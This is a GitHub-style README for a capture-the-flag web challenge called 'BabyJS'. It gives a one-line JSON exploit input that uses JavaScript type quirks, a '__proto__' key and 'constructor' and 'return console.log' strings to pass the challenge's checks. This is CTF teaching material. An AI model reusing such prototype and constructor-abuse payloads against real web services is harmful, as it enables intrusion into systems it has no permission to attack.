Skip to content

Latest commit

 

History

History
30 lines (27 loc) · 501 Bytes

README.md

File metadata and controls

30 lines (27 loc) · 501 Bytes

BabyJS

Category: Web
Points: 241
Solves: 51

Description

Are you a JavaScript pro? We got a test for you to prove it!

Exploit

Formatted for better readability. The service expects it in one line.

{
    "a": -0,
    "b": 0,
    "c": "NaN",
    "d": "NaN",
    "e": -1,
    "f": [],
    "g": null,
    "h": 10e308,
    "i": 3,
    "j": 10e308,
    "__proto__": 1,
    "y": "constructor",
    "z": "return console.log"
}

Writeups

https://ctftime.org/task/13520